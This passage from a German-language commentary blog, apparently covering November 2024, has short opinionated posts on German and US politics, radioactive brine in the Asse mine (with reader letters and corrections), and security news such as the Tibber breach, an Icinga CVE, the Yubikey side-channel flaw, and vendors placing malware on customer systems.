Dort könne er wie andere junge Männer zwar zum Grundwehrdienst eingezogen werden, erkennt das Gericht an. Das Richtergremium führt aber eine Reihe von Gründen an, warum dies keinen Schutz vor Abschiebung rechtfertige. So heißt es, dass es aktuell keine Hinweise auf eine Teilnahme russischer Grundwehrdienstleistender an Kampfhandlungen in der Ukraine gebe. Sie würden zum Grenzschutz entlang der Grenze zur Ukraine und auf der Krim eingesetzt.
Und das weiß ja wohl jeder: Die Kampfhandlungen finden nicht an der Grenze statt. Sie verschieben höchstens die Grenze in das feindliche Territorium hinein. Vorwärtsverteidigung!
Dann führt das Richtergremium aus, dass eine Teilnahme an Kampfhandlungen in Russland der Verteidigung eigenen Territoriums diene und "keine unmenschliche oder erniedrigende Behandlung" im Sinne des Artikel 3 der Europäischen Menschenrechtskonvention darstelle, die rechtliche Grundlage für den Schutzstatus in Deutschland ist.
Nee, klar. Ich vermute mal, die Richter sind lange nicht mehr zum Wehrdienst eingezogen worden.
[l] Das mit Radioaktivität von Wasser scheint ein komplexeres Thema zu sein, denn es kommt noch ein Leserbrief dazu:
Laut NDR-Bericht, der ja seinerseits auch falsch sein kann - die werten ÖRR-Journalisten halten es fast nie für nötig Quellen anzugeben - ist die Aktivität JE NACH ISOTOP angegeben.
Die zitierten 370 Bq / kg Grenzwert für Milch beziehen sich nur auf Aktivität aus radioaktivem Cäsium und nicht auf die gesamte Aktivität. Der Grenzwert ist spezifisch nur für Cäsium-Isotope in der Milch.
Im Asse-Wasser scheint die Radioaktivität aber vom Tritium zu stammen. Die Cäsium-Aktivität des Asse-Wassers ist laut NDR mit 7 Bq sehr gering
Man müsste die Gesamtaktivität einer bestimmten Menge Asse-Wasser kennen, diese wird im NDR-Artikel aber nicht genannt.
Jetzt brauchen wir nur noch jemanden, der uns erklärt, wieso für verschiedene Isotope verschiedene Grenzwerte gelten :-)
Update: Ich versuche mich mal an einer Erklärung für die Grenzwerte. Es gibt Alpha-, Beta- und Gammastrahler. Alpha- und Beta-Strahler kommen nicht durch die Haut, was gut ist, wenn sie einen von außen bestrahlen, aber schlecht, wenn man sie einnimmt. Auf der anderen Seite kommt Tritium als "schweres Wasser" und Wasser scheidet der Körper in relativ großen Mengen regelmäßig aus.
Die nächste Frage ist, welche Zerfallskette der Stoff hat. Tritium zerfällt direkt zu Helium, das strahlt nicht und ist ein Edelgas und schadet nicht. Uran zerfällt über mehrere Schritte voller giftiger radioaktiver Isotope zu Blei, was dann zwar nicht mehr strahlt aber hoch giftig ist.
Das alles müssen die Grenzwerte abbilden.
[l] Ist hier jemand Tibber-Kunde?
Hacker haben sich am Stromanbieter Tibber vergriffen und Daten geklaut. Das bestätigte das Unternehmen gegenüber heise security. Betroffen sind offenbar über 50.000 Kunden, allesamt aus Deutschland. Die Angreifer bieten ihre Beute im Darknet zum Kauf an.
Tibber ist ein IoT-Startup, das den Leuten "Smart"-IoT-Scheiß andreht dann den Strom zum aktuellen Börsenpreis in Rechnung stellt.
[l] Ein anderer Leserbrief widerspricht dem Asse-Mineralwasser-Leserbrief:
wenn ich das auch nur annähernd richtig verstehe, ist die Rechnung falsch. Der Einsender rechnet blauäugig die Aktivität des Asse-Wassers (angegeben in Bq, also Zerfälle pro Sekunde) per Umrechnungsfaktor in eine Dosis um (in Sievert, eine Einheit, in der "Sekunde" nicht vorkommt).
Um das richtig zu machen, müsste man eher abschätzen, wieviel von dem kontaminierten Wasser man durchschnittlich im Körper hat, wenn man es regelmäßig trinkt, diese Menge mit seiner Aktivität in Bq multiplizieren, dann das Ganze mit der Anzahl der Sekunden in einem Jahr multiplizieren, und erst dann den ominösen "Sv/Bq" Umrechnungsfaktor anwenden. Da kommt dann ein Wert heraus, der ganz grob eine Million mal höher ist.
Dass an der ursprünglichen Rechnung etwas nicht stimmt, kann man auch mit gesundem Menschenverstand überprüfen. Die gesetzlichen Grenzwerte für Milch liegen bei 370 Bq/kg. Im Vergleich dazu klingen 15 kBq/l für das Asse-Wasser nicht mehr ganz so gesund...
Und wenn man einen Geigerzähler in die Nähe einer Wasserflasche mit 15 kBq/l bringt, macht der einen solchen Lärm, dass man garantiert keinen Durst mehr hat.
Update: Nach näherer Überlegung möchte der Leserbriefautor seinen Leserbrief zurückrufen / erweitern:
Sorry ... nach etwas mehr Recherche nehme ich fast alles zurück und behaupte das Gegenteil :-/
Die Rechnung des Einsenders bleibt ein bisschen ein Äpfel-mit-Birnen-Vergleich, weil sich das verlinkte Dokument vom BfS ausschließlich auf Radioaktivität von schweren Nukliden bezieht und nicht auf Tritium, das in der Asse gemessen wurde), aber der Dosiskoeffizient berücksichtigt tatsächlich die Gesamtdosis, die von Material mit einer bestimmten Aktivität (in Bq) insgesamt im Körper deponiert wird ... wie man das genau anstellt, ist mir nicht ganz klar, vor allem bei Dingen wie Wasser, die eine relativ kurze (und oft nicht gut bestimmbare) Verweildauer haben.
Das entscheidende Punkt ist wohl, dass Tritium wegen seiner niedrigen Zerfallsenergie sehr wenig "Schaden pro einzelnem Zerfall" anrichtet, im Vergleich zu z.B. Uran- oder Radiumisotopen; das heißt, selbst wenn tausendmal mehr Tritium-Zerfälle pro Sekunde stattfinden als, sagen wir mal, Uran-235-Zerfälle, kann das Uran trotzdem deutlich mehr Probleme verursachen.
Zu meinem Geigerzähler-Argument: soweit ich es jetzt verstehe, ist die Zerfallsenergie bei Tritium _so_ niedrig, dass normale Detektoren überhaupt nicht anschlagen ... Geigerzähler würden also die Bevölkerung in diesem Fall nicht verunsichern.
Es tut mir leid, dem Original-Einsender so unqualifiziert an den Karren gefahren zu haben ... Asche auf mein Haupt.
[l] Aus aktuellem Anlass hat Michael Moore "Fahrenheit 11/9" auf Youtube hochgeladen.
Update: Hups, Fahrenheit 11/9 nicht Fahrenheit 9/11. Der Film handelt von Donald Trumps erster Präsidentschaft, nicht von 9/11.
[l] Spanish police arrest ex-fraud chief after €20m found in walls of his house. Wofür genau war der früher zuständig, fragt ihr? Für Geldwäsche-Bekämpfung. Nein, wirklich!
[l] Habt ihr das auch gehört? Wir müssen endlich diese Scheiß Flüchtlinge abschieben!
Nun, … hier muss ein Pflegeheim schließen, weil die Politik aus AfD-Arschkriechgründen 10 Pfleger nach Kolumbien abschieben will.
Wegen des Pflegenotstands rechne er nicht damit, neues Personal zu finden.
Man fragt sich ja schon, ob die Nazis keine Eltern mit Demenzerkrankungen haben. Oder vielleicht merkt man das bei Nazi-Eltern nicht so, wenn die dement werden?
Update: Achtet auch auf das wunderschöne überspezifische Dementi des Ministeriumssprechers:
"Nach unseren Informationen sind für morgen keine Abschiebungen von kolumbianischen Staatsbürgern aus Niedersachsen geplant"
[l] Benutzt hier jemand Icinga?
In der Sicherheitsmitteilung schreiben die Programmierer der Open-Source-Software, dass die Icinga-2-Master, -Satelliten und -Agents in unterschiedlichen Setups von einer fehlerhaften Zertifikatsüberprüfung betroffen sind. In allen Icinga-Versionen ab 2.4.0 können Angreifer die Prüfung umgehen und so vertrauenswürdige Cluster-Knoten sowie jedweden API-Nutzer, der TLS-Client-Zertifikate zur Authentifizierung nutzt, imitieren (CVE-2024-49369, CVSS 9.8, Risiko "kritisch").
You had ONE Job!

Tue Nov 12 2024

[l] Meine Damen und Herren, wir kriegen endlich Produkthaftung für Software. Fuck yeah!
[l] Das US-amerikanische Schulsystem performt.
Illiteracy has become such a serious problem in our country that 130 million adults are now unable to read a simple story to their children
Aber keine Sorge. Mit dem Angriff Vance kommt das alles in Ordnung. Schritt 1: Bücher verbieten.
Update: Die Lage ist noch schlimmer als befürchtet. Klickt mal auf der verlinkten Seite auf Home:
Discovering Our Future of Education through the Lenses of Artificial Intelligence and its potential impact on education and the wider world
NEEEIIIIINNNNN!!!!!
[l] Die FDP hat ein neues Ziel: Den Solidaritätszuschlag abschaffen.
Den braucht es nicht mehr, denn der Aufbau Ost ist fertig.
Wie, warte, was hat denn die FDP gegen die Ossis? Nichts!
Im Jahr 2021 änderte sich die Besteuerung. Seitdem zahlen ihn nur noch Gutverdienende ab einem jährlichen Bruttoeinkommen von etwa 85.000 Euro sowie Unternehmen. Alle anderen Steuerzahler hatte die damalige Große Koalition vom Soli befreit.
Die FDP macht lediglich mal wieder Politik für Reiche.

Mon Nov 11 2024

[l] Ich hab mich ja schon länger auf unseriöse Security-Hersteller eingeschossen, weil ich das für einen absoluten Bärendienst halte, wenn man von Security spricht und dann hintenrum Dinge nicht einlöst oder Sicherheitslücken kleinredet. Gerade der Code von Security-Firmen sollte technisch über alle Zweifel erhaben sein, finde ich. Ist er aber in der Praxis so GAR nicht. Sehr betrüblich.
Nehmen wir nur Infineon. Die haben schon eine lange Geschichte von verkackter Security, und schlimmer noch: Von Lücken, die Jahre bis Jahrzehnte "unentdeckt" bleiben und die sie dann kleinreden, wenn sie rauskommen. Infineon geriert sich gerne als Smartcard-Spezialexperte aber die Kunden verhungern dann am langen Arm.
Ein aktuelleres Beispiel war Eucleak, ein Angriff auf eine Infineon-Library (Code!!) in Yubikeys der Serie 5. Auch diese Lücke war mal wieder ewig alt und segelte 14 Jahre lang durch 80 Common-Criteria-Zertifizierungen.
Für mich ist der Fall klar: Da hatte niemand ein Interesse daran, sichere Produkte zu produzieren. Infineon war wichtig, den Scheiß zu verkaufen, den Zertifizierern war wichtig, Kohle abzugreifen, und den Behörden war wichtig, Theater zu veranstalten, damit ihre Zertifizierungen hilfreich und wichtig aussehen. Aus meiner Sicht ist das Gegenteil der Fall.
Das war ein Seitenkanalangriff mit dem man das geheime Keymaterial extrahieren kann. Das ist für ein Security-Token, dessen einzige Daseinsberechtigung ist, das geheime Keymaterial vor Zugriff zu schützen, ein verdammter Totalschaden.
Yubikey wird also sofort alle Keys zurückgerufen und ausgetauscht haben, richtig? Und Infineon als Schuldiger wird die Kosten getragen haben? Haha, nichts davon ist passiert! Infineon sitzt in ihrem Geldspeicher und zählt die Dollars, bringt eine neue Softwareversion raus und findet, der Rest sei nicht ihr Problem. Yubikey hat Infineons Marketing-Koolaid getrunken und keinen Weg zum Softwareupdate eingebaut, weil das die Sicherheit der Geräte kompromittieren würde.
Jetzt wo die Geräte auch ohne Updatemöglichkeit kompromittiert sind, versucht ein Kumpel von mir seit ein paar Wochen, seine drei Yubikeys tauschen zu lassen. Yubikey hat dem erzählt: Lolnope. Dafür braucht ein Angreifer enorme kriminelle Energie und Spezialhardware!1!! Das tauschen wir nicht.
Das, meine Damen und Herren, ist der Zustand der Security-Branche. Die Software-Klitschen sind ja schon alle furchtbar, aber die Hardware-Klitschen sind bei näherer Betrachtung nicht besser.
Aber hey, glaubt nicht mir, dass dieses Yubikey-Problem gefährlich ist. Glaubt den Österreichern, die Yubikeys mit der alten Software für ID Austria und xIDENTITY (deren elektronischer Identitätsnachweis für digitale Behördengänge) nicht mehr zulassen, weil man da zu leicht den Schlüssel extrahieren kann. Wenn ihr mal schlechte Laune kriegen wollt, guckt euch die Infineon-Marketingmaterialien zu elektronischen Ausweisen an.
Update: Ist sogar noch krasser, wie ein Leser anmerkt:
zu der Yubikey-Geschichte sei noch angemerkt, dass die aktuell sogar so dreist sind erstmal ihre Lagerbestände mit verwundbaren Keys abzuverkaufen anstatt die zu verschrotten. Hab neulich zwei von den Dingern bestellt (die teure FIPS-Variante!) und was bekomme ich geliefert? Die Keys mit der alten, verwundbaren Firmware. Hintergrund soll wohl sein, dass die zunächst Behörden und andere "priorisierte" Kunden mit den Keys mit der neuen Firmware beliefern.
Aber so machen sie noch einen Reibach mit dem alten Schrott. D.h. selbst wenn man sie gerade neu kauft kriegen Kunden Müll geliefert.
[l] Leserbrief zum radioaktiven Wasser in der Asse:
Erst der spaßige Teil bzgl. der Strahlung:
Ich hab mal gesucht, was Mineralwasser so hat. Eigentlich wollte ich auch mal "Heilwässer" aus Karlsbad etc berechnen aber da findet man komischerweise keine Daten...
Naja also mal angenommen jemand trinkt 200 Liter von dem Salzwasser im Jahr mit 15k Bq/l dann sind wir bei 3E6 bq.
Die offiziellen Dosiskoeffizienten bekommt man bei der Bundesregierung und für Erwachsene über 17 ist das 1,8E-11 Sv/Bq und damit kommen wir auf rund 54 MicroSievert pro Jahr.
Damit ist nach Bundesamt für Strahlenschutz das Wasser ungefähr so radioaktiv in seiner Wirkung wie Josefsquelle und Rhäzünser.
Wahrscheinlich "bisschen" salziger.
Wer Deutschlands beliebtestes Mineralwasser, Gerolsteiner, die Treppen schleppt müsste demnach mind. 2000 Liter davon im Jahr süffeln um äquivalent viel abzubekommen.
Der Leser ist aber auch Geophysiker und hat noch ein paar fachliche Dinge anzumerken.
"Demnach sei das Salzwasser in einer Tiefe von 700 Metern gefunden worden, also oberhalb der Haupteinlagerungsebenen für Atommüll in 725 und 750 Meter."
Das ist Quatsch. In jeder Grundwasserdynamik-Vorlesung, 1. Stunde wird sofort klar, dass "es ist höher also muss von oben" für gespannte Aquifere nicht gilt.
Da gilt harte Geologie und solange die da keine absolut wasserdichte Sperrschicht bei 710 oder so haben(und die haben sie nicht denn hier schwimmt ja ein Salzdom durchs Sediment nach oben, der alles kaputt drückt) sind solche Aussagen schlicht Unsinn.
Ich hab außerdem die Seismik gesehen, von mehreren Salzstöcken. Da ist alles kaputt. Und war es auch immer schon.
Zitat von alten Messtrupps ausm Feld: "Nach den ersten Schüssen hätten wir eigentlich aufhören können"
Und das alles noch vor Geophysikalischer Prozessierung und allem.
In der Geo-Industrie ist das mehr oder weniger ein offenes Geheimnis, bzw. sogar öffentlich.
Wie so ne Seismik dann aussieht und ein Salzstock, der nach oben Schwimmt kannst du dir hier angucken, lohnt sich alleine zum Lernen. [Asse-Bericht der Bundesgesellschaft für Endlagerung].
Seite 76 gibt's ein erstes schönes Bild der Seismik.
Wer mir hier erzählen will dass die Aquifere dicht sind kann bitte weggehen, das sehen auch Amateure, dass das nicht so ist.
Das Modell inklusive interpretierter Risse ist auf Seite 108 mal auszugsweise für EINES der Profile. Nur ein Schnitt.
Das sind also alles nur Schutzbehauptungen, um Verantwortlichkeiten in die Vergangenheit abzuwälzen, denn der Vorbetreiber war ja... Forschungsbergwerk.
Die Herkunft über Isotopenuntersuchungen etc. nachzuweisen würde die BGE angesichts ihrer Finanzen ein Fingerschnipsen kosten aber ich schätze die Details könnten die Bevölkerung beunruhigen.
Wenn du richtig Bock hast Strg+F "Schädigung" im Geotechnischen Monitoring-Bericht.
Mal ganz abgesehen davon sind diese Berichte auch ein Paradebeispiel für den Stand der Digitalisierung in D:
"Wenn wir n PNG ins PDF packen isses doch digital!!!!1111elf"
Eins muss ich den BGElern allerdings lassen: Normalerweise wird sowas absolut und unter gar keinen Umständen öffentlich. Chapeau.
[l] Old and busted: Sophos gibt zu, ihren Kunden Malware installiert zu haben.
New hotness: Palo Alto gibt zu, ihren Kunden Malware installiert zu haben.
As a means to test an AV/EDR bypass tool, these endpoints had older versions of Cortex XDR agents installed. Unbeknownst to the threat actor, we were able to access these rogue endpoints.
We also discovered a series of toolkits and other files belonging to the threat actor on the system, which included the bypass tool. We successfully traced and identified posts related to the sale of this specific tool on cybercrime forums like XSS and Exploit.
[l] Kennt ihr eigentlich die Geschichte von den Hutnadelgesetzen?
[l] Ich hatte es schon angesagt: Ihr solltet euch nicht Sorgen um Donald Trump machen, sondern um JD Vance, seinen Triebtäter von einem Vizepräsidenten.
Der schlug gerade vor, dass die USA die Nato nicht mehr unterstützen, außer die EU schafft eine Ausnahme für Musk-Twitter in ihrer Regulierungsagenda.
Das ist natürlich ein echter Lacher, denn die USA "unterstützen" ja nicht die Nato sondern die haben das immerwährende Kommando. Nur aus Kunstförderungsgründen betreibt die Nato das Theater, sich einen europäischen "Generalsekretär" zu leisten für die Kameras, der natürlich überhaupt gar nichts zu melden hat innerhalb der Nato.
Trump hingegen ist so abgewrackt, dass er bei seinem (auch schon skandalösen) Telefonat mit Selenskyj vorsichtshalber eine zweite Hirnzelle in Form von Elon Musk mitgebracht hat. Die drei apokalyptischen Reiter.
[l] Achtet mal darauf, wie die CDU (die ja mehrere Landesregierungen in Koalition mit den Grünen hat) ihren Zwergpinscher Söder gegen Habeck losschickt.
Die haben erkannt, wer der einzige seriös aussehende Kanzlerkandidat im Moment ist, und müssen ihn angreifen, aber brauchen für ihre Landeskoalitionen plausible deniability.
Und jetzt pinkelt auch noch Elon Musk gegen den Wind in Richtung Habeck.
Freut mich, dass die alle erkannt haben, wer hier der einzige satisfaktionsfähige Kanzlerkandidat ist. Wobei das bei dem Söder auch einfach Rachegelüste sein könnten, dafür wie krass Habeck ihn im Februar öffentlich rundgemacht hat (Achtung: Tiktok-Link mit nerviger Hintergrundmucke).
Update: Ein Leser hat ein Video der Habeck-Söder-Debatte gefunden.
Update: Falschen Videolink korrigiert.
[l] Taiwan verbietet TSMC die Fertigung von <= 2nm Halbleitern außerhalb Taiwans.
Die Regierung hat anscheinend kapiert, dass wenn die Amis darauf bestehen, TSMC-Fabriken in den USA aufzubauen, dass dann die dann keinen Druck mehr haben, Taiwan im Zweifelsfall gegen die Chinesen zu verteidigen.
[l] Zu den Verschwörungstheorien zum Wahltermin kamen Leserbriefe rein.
Cum-Ex liegt schon über 10 Jahre zurück, die Akten sind also schon vernichtet. Das Bundeswahlgesetz erlaubt ein Abkürzen der Fristen im Falle einer Auflösung des Bundestags.
Update: Bei besonders schwerer Steuerhinterziehung liegt die Verjährungsfrist bei 15 Jahren, nicht bei 10, und würde mit dem Gesetz auf 8 abgekürzt. Diese Theorie ist also noch im Rennen.
[l] Nachdem wir hier ein paar Theorien im Blog hatten, wieso der Scholz erst im März wählen will (es gibt da übrigens auch gesetzliche Pflichten)... Wieso will die CDU eigentlich unbedingt vor Februar wählen?
Auch dafür gibt es eine schöne Verschwörungstheorie: Die CDU würde in Sachsen gerne mit der AfD koalieren, weil die ja inhaltlich eh einer Meinung sind: Ausländer raus und neoliberale "Wirtschaftspolitik" unter der Annahme ewigen Wachstums. Zusammen hätten die eine 2/3-Mehrheit, aber das würde auf Bundesebene Stimmen kosten.
Der Ministerpräsident in Sachsen muss spätestens bis zum 3. Februar gewählt werden. Also will die CDU die Bundestagswahl vorher durchgezogen haben. (Danke, Lennart)

Sun Nov 10 2024

[l] Ich bin ja mit meinem Blog nicht nur ein Sammler von Verschwörungstheorien, ich bin auch eine Cassandra in der IT-Security-Branche. Seit Jahrzehnten sage ich, dass Antiviren die Angriffsoberfläche nicht senken sondern erhöhen, dass das ein falsches Versprechen von Sicherheit ist, dass sich Leute von "Metriken" blenden lassen, die von voreingenommener Seite produziert und vorgelegt werden, und dann falsche Entscheidungen treffen.
Bei Verschwörungstheorien beobachte ich immer begeistert, wie jahrelanges Wegleugnen eines Tages spontan umspringt, entweder zu "haben wir doch schon immer gewusst" (hat sich aber nie im Handeln niedergeschlagen und wurde die ganze Zeit nach Kräften geleugnet!), oder, noch schlimmer, zu "haben wir doch schon immer gesagt" (eine glatte Lüge).
Umso erfreulicher für mich in letzter Zeit, wie sich bei Kernthemen von mir langsam herauskristallisiert, dass wir uns diesem Kipppunkt nähern.
Heise-Kommentar: Sophos und der gebrochene Schwur. Was ist der gebrochene Schwur? Dass Sophos Malware an ihre Kunden verteilt hat, um angebliche chinesische Hacker auszuspionieren, die ihre kaputte Sophos-Software genutzt haben, um Sophos-Kunden anzugreifen. Hier mein Kommentar zu der Sophos-Nummer, als die ganz frisch war. Jürgen Schmidt, Chef von Heise Security, dazu:
Sie haben selbst Spionage-Software entwickelt und die gezielt auf Systemen von Kunden platziert, um diese auszuforschen. Das war eigentlich ein ungeschriebenes Gesetz der Branche: Wir entwickeln keine Malware und insbesondere setzen wir sie nicht ein, um unsere Kunden auszuspionieren.
Ich würde noch einen Schritt weiter gehen und sagen: Das war schon immer Malware. Gut, ich habe da Einblicke, die vielleicht nicht jeder hat. Ich weiß, wie so "Antiviren" funktionieren, und was für Methoden die verwenden, um Kernel-Calls zu hooken und ihren Code in Prozesse zu injecten. Das ist genau das, was eine Verhaltens-Anomalie-Erkennung sofort als Malware flaggen würde. Daher haben die Antiviren Whitelists drin, um sich nicht gegenseitig zu flaggen, und warnen explizit davor, nur eine "Endpoint Security" zur Zeit zu installieren, und deshalb schaltet Norton erstmal den MS Defender aus. Der würde nämlich alle Alarmglocken zünden, wenn Norton tut, was Norton halt so tut. Norton hier als Stellvertreter für alle Antiviren.
Wenn man das weiß, dann wird spontan klar: Das war schon immer Malware, die sich Rechte rausnimmt, die man im System niemandem zugestehen sollte, schon gar nicht Vertriebsgetriebenen Firmen wie Antivirenherstellern.
Dieses ungeschriebene Gesetz, das Jürgen hier zitiert, das gab es noch nie. Das war schon immer ein Trust Me I Know What I'm Doing, und genau wie bei Wurstproduktion will der Konsument da gar nicht so genau hingucken, weil er weiß: Wenn er wüsste, was da passiert, könnte er das Produkt nicht mehr konsumieren.
Ich für meinen Teil finde auch nicht glaubwürdig, dass Sophos diesen Übersprung dazu, mit krimineller Energie Malware an ihre Kunden auszuliefern und deren Systeme absichtlich weiter zu gefährden, nur in diesem einen Fall gegen die fiesen Chinesen einsetzt. Kriminelle Energie mateiralisiert sich nicht über Nacht. So viel kriminelle Energie muss man über Jahre hegen und pflegen. Nur eine durch und durch unvertrauenswürdige Firma würde auch nur erwägen, solche Methoden einzusetzen.
Überlegt euch auch mal, wie verbogen deren moralischer Kompass sein muss, damit sie das auch noch für eine gute Idee, das öffentlich zuzugeben und sich damit als Helden zu feiern zu versuchen.
Sophos steht hier als Stellvertreter für alle Antiviren. Glaubt mal gar nicht, dass irgendeiner von denen vertrauenswürdig ist.
Hier ist noch ein Kipppunkt-Indikator. Ein anderer Heise-Kommentator pflichtet mir bei, dass es ungefährlicher ist, für Entdecker von Sicherheitslücken, die im Darknet zu verkloppen als sie dem Verursacher zu melden. Ich persönlich habe seit mindestens 20 Jahren keine Sicherheitslücken mehr initiativ-gemeldet oder auch nur gesucht. Ich suche Sicherheitslücken, wenn mich der Hersteller dafür bezahlt. Wenn ich über eine stolpere, melde ich die nur wenn es sich um freie Software handelt. An Bug Bounty-Programmen nehme ich nicht teil.
Die Lobbyisten der Industrie haben die Rahmenbedingungen so gesetzt, dass ich auch allen anderen nur raten kann, es mir gleich zu tun. Anderes aktuelles Beispiel in dem Kontext waren die polnischen Eisenbahnhacker auf dem letzten CCC-Kongress.
Die mussten sich inzwischen vor Gericht einer Klage dieser Firma stellen. Ich bewundere deren Heldenmut, aber hätte ich nicht gemacht. Da wäre ich Trump-Wähler und würde den ganzen Apparat herunterbrennen sehen wollen, bevor ich wieder mitzuhelfen bereit wäre. Dankt CDU und FDP.
Auch da scheint sich inzwischen die Erkenntnis breit zu machen, dass ich die ganze Zeit Recht hatte, und es gibt jetzt den Versuch eines Reförmchens. Ich glaube es, wenn ich es sehe.
Wenn man bedenkt, wie viel billiger und besser wir das alles hätten haben können, wenn die Leute gleich auf mich hören würden. Aber Plan B greift auch: Aus Schmerzen lernen. In diesem Sinne: Geht ihr mal alle in die Cloud und macht Blockchain, IoT und "KI". Wir sehen uns in 10 Jahren wieder und weinen gemeinsam dem verbrannten Geld hinterher.
[l] Ein Leser schreibt mir noch einen weiteren Grund für die Neuwahlen erst im März: Am 1. Januar tritt das Bürokratieentlastungsgesetz IV in Kraft, das u.a. die Aufbewahrungsfristen für Cum-Ex-Akten von 10 auf 8 Jahre reduziert.
Der Leser setzt Cum-Ex-Olaf daher in eine Linie mit Netanjahu, Trump und Berlusconi, wenn es darum geht, das Amt auszunutzen, um sich selbst vor Strafverfolgung zu bewahren.
[l] Was passiert, wenn in deutschen Behörden der Kapitalismus ausbricht?
Eine Weile nichts, dann werden Papier und Drucker knapp. (Achtung: Link geht zur "Bild") (Siehe auch) (Danke, Daniel)
[l] Wenn man mit Ökonomen oder Kapitalisten über Roboter und Automatisierung spricht, kommt ganz schnell eine Darstellung der Form: Ja gut, da gehen Jobs verloren, aber dafür entstehen ja andere Jobs! Unter dem Strich wird alles besser, weil die Preise sinken!
Das haben jetzt mal ein paar Wissenschaftler geprüft, anhand der Zahlen von den Jahren 2000 bis 2008 und teilweise noch später. Stellt sich raus: Automatisierung zerstört Karrieren, und zwar nachhaltig.
Früher konnte man ohne Ausbildung irgendwo anfangen, am Job lernen, und hatte dann mit der Zeit Chancen, seine Karriere zu besser bezahlten Jobs aufzuwerten.
Mit der Einführung von Automatisierung hat man diese Aufwärtschance nicht mehr, sondern man kann nur auf andere Jobs ausweichen, die höchstens gleich gut bezahlt sind.
Schlimmer noch: Automatisierung in der Produktion von Branche A hat auch die Karrieren in anderen Branchen zerstört, z.B. örtliche Läden oder Dienstleister. Denn die Leute hatten ja weniger Geld in der Tasche und konnten sich damit weniger Dinge leisten und damit geht dann die gesamte örtliche Wirtschaft ein.
Wenn euch also das nächste Mal jemand erzählt, wenn "KI" Jobs ersetzen, dann sollen die Leute halt andere Jobs machen, dann könnt ihr die weiterhin auslachen, und ab jetzt fundiert.
Oh, und:
"Areas most affected by robotization saw stronger support for populist candidates like Donald Trump in 2016," he noted. "The connection between career uncertainty and political realignment is clear: as people lose faith in their ability to advance economically, they seek alternative political solutions."

Sat Nov 9 2024

[l] Ich verstehe ehrlich gesagt nicht, wieso die Presse sich so über Habeck als Kanzlerkandidaten lustig macht.
Ich bin kein Freund der Grünen, aber das ist die einzige Partei, die überhaupt einen Kandidaten aufstellt!
Das Missverhältnis zwischen den Kandidaten ist so krass, dass ich mir sogar vorzustellen anfange, für die Grünen zu stimmen, weil der Habeck so offensichtlich und mit so einem Abstand der einzige erwähnenswerte Kandidat ist.
[l] Ihr ahnt ja nicht, was sie gerade in der Asse gefunden haben!
Nein, nicht Godzilla. Immerhin.
Atomlager Asse: Bergleute stoßen auf radioaktives Salzwasser
Money Quote:
Die Bundesgesellschaft für Endlagerung (BGE) rätselt über die Herkunft.
EIN MYSTERIUM!!1!
Die BGE hatte im Sommer dieses Jahres ungewöhnlich starke Bewegungen im Gestein des früheren Salzbergwerks registriert.
Werden wir wohl nie herausfinden.
Tja. Das passiert halt, wenn man CDU oder SPD wählt und die Probleme aussitzen lässt.
[l] Die Zeiten sind hart! Da muss man im Kapitalismus kreativ werden, um überleben zu können!
Aktuelles Beispiel:
Ambulance hits Oregon cyclist, rushes him to hospital, then sticks him with $1,800 bill, lawsuit says

Fri Nov 8 2024

[l] Der Macron ist schon manchmal ein echt cooler Hund.
Congratulations, President @realDonaldTrump. Ready to work together as we did for four years. With your convictions and mine. With respect and ambition. For more peace and prosperity.
Spoiler: Da ist ein subtiler Wortwitz drin.
[l] Hier mal eine Betrachtung der US-Präsidentschaftswahl, die ihr noch nicht gesehen habt in den Medien.
Ergebnis 2024:
Kamala Harris: 69,109,836 votes (47.7%)
Donald J. Trump: 73,450,164 votes (50.7%)
Ergebnis 2020:
Joe Biden: 81,284,666 (51.3%)
Donald J. Trump: 74,224,319 (46.9%)
Der Donald hat praktisch genau so viele Stimmen eingefahren. Die Democrats haben hingegen haben über 10 Millionen Stimmen verloren.
Die sind einfach nicht zur Wahl gegangen. Und so wie die Democrats sich gerade für ihren "großartigen" Wahlkampf feiern, werden die dann wohl auch nächstes Mal nicht zur Wahl gehen.
Schritt 1: Anerkennen, dass es ein Problem gibt.
[l] Was machen die eigentlich auf so Klimaschutzkonferenzen?
Na Erdöl verkaufen!
A senior official at COP29 climate change conference in Azerbaijan appears to have used his role to arrange a meeting to discuss potential fossil fuel deals, the BBC can report.
Das ist kein Ausreißer.
[l] Noch mehr Infrastrukturapokalypse: Fahrbahn abgesackt! A40 im Kreuz Kaiserberg länger gesperrt. (Danke, Dino)
[l] Infrastrukturapokalypse: Die Elbbrücke in Bad Schandau ist ab sofort gesperrt. Sie haben Längsrisse gefunden und die Brücke ist wohl baugleich zu der in Dresden eingestürzten Brücke. (Danke, Felix)
[l] Datenreichtum in Dresden.
Ein 54-Jähriger soll als Systemadministrator der Stadt Dresden abertausende Dateien und personenbezogene Daten von 430.000 Bürgern auf privaten Speichergeräten gesichert haben.
Hey, vielleicht hatte die Verwaltung nicht genug Geld für den Kauf von Speichermedien und der Mann wollte bloß helfen! (Danke, Hans)
[l] Die größte Tragik am Aufstieg der AfD ist ja, wie sehr sich die anderen Parteien schon deren Inhalten angenähert haben. Ausländerhetze ist salonfähig geworden und alle faseln von "irregulären Migranten".
Aktueller Höhepunkt: CDU-Landtagspolitiker wegen Volksverhetzung verurteilt.
Update: Technisch gesehen ist es ein Strafbefehl. Einige Leser schreiben mir jetzt, das sei ja etwas anderes als eine Verurteilung, weil das quasi ein freidrehender Staatsanwalt alleine auslösen kann. Stimmt aber nicht: Der Staatsanwalt kann einen Antrag beim Gericht stellen und das Gericht erlässt dann den Strafbefehl. Wikipedia dazu:
Das Strafbefehlsverfahren ist im deutschen Recht ein vereinfachtes Verfahren zur Bewältigung der leichten Kriminalität durch einen schriftlichen Strafbefehl. Die Besonderheit des Strafbefehlsverfahrens liegt darin, dass es zu einer rechtskräftigen Verurteilung ohne mündliche Hauptverhandlung führen kann. Dies entlastet Gericht, Staatsanwaltschaft, Polizei und andere Behörden (die nicht als Zeugen geladen werden müssen), kann aber auch im Interesse des Beschuldigten liegen, da das Verfahren kostensparend, schnell und ohne Aufsehen erledigt wird.[1] Nach aktuell herrschender Meinung muss die Schuld des Täters dabei nicht zur Überzeugung des Gerichts feststehen, sondern es genügt ein hinreichender Tatverdacht.[2]
Update: Ah, also zu einer Verurteilung wird ein Strafbefehl, wenn man keinen Widerspruch einlegt. Hat er aber.
[l] Old and busted: Ransomware will in Crypto-Währung bezahlt werden.
New hotness: Ransom ohne -ware will in Crypto-Währung bezahlt werden. Gekidnappt hatten die Gangster den Chef einer Crypto-Firma.
Money Quote:
"The safety and security of all of WonderFi's employees are paramount," Skurka said in the email. "Client funds and data remain safe, and were not impacted by this incident."
